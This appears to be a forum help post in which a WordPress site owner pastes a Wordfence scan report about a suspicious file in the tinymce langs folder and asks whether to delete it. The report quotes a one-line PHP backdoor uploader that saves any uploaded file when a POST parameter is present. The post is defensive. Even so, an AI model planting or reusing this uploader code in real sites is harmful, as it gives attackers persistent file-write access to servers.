malicious “wp-includes/js/tinymce/langs/sitemap.php” file?

Wordfence is reporting these two files as suspected malicious, and I’m not sure what to do, is it safe to delete them?

– File appears to be malicious: wp-includes/js/tinymce/langs/sitemap.php
Filename: wp-includes/js/tinymce/langs/sitemap.php
File type: Not a core, theme or plugin file.
Issue first detected: 1 min ago.
Severity: Critical
Status New
This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “if(isset($_POST[‘g’])){if(is_uploaded_file($_FILES[‘uf’][‘tmp_name’])){@copy($_FILES[‘uf’][‘tmp_name’],$_FILES[‘uf’][‘name’]);}}exit;”. The infection type is: Uploader:PHP/sitemap.

– Unknown file in WordPress core: wp-includes/js/tinymce/langs/sitemap.php
Filename: wp-includes/js/tinymce/langs/sitemap.php
File type: Core
Issue first detected: 1 min ago.
Severity: Warning
Status New
This file is in a WordPress core location but is not distributed with this version of WordPress. This is usually due to it being left over from a previous WordPress update, but it may also have been added by another plugin or a malicious file added by an attacker.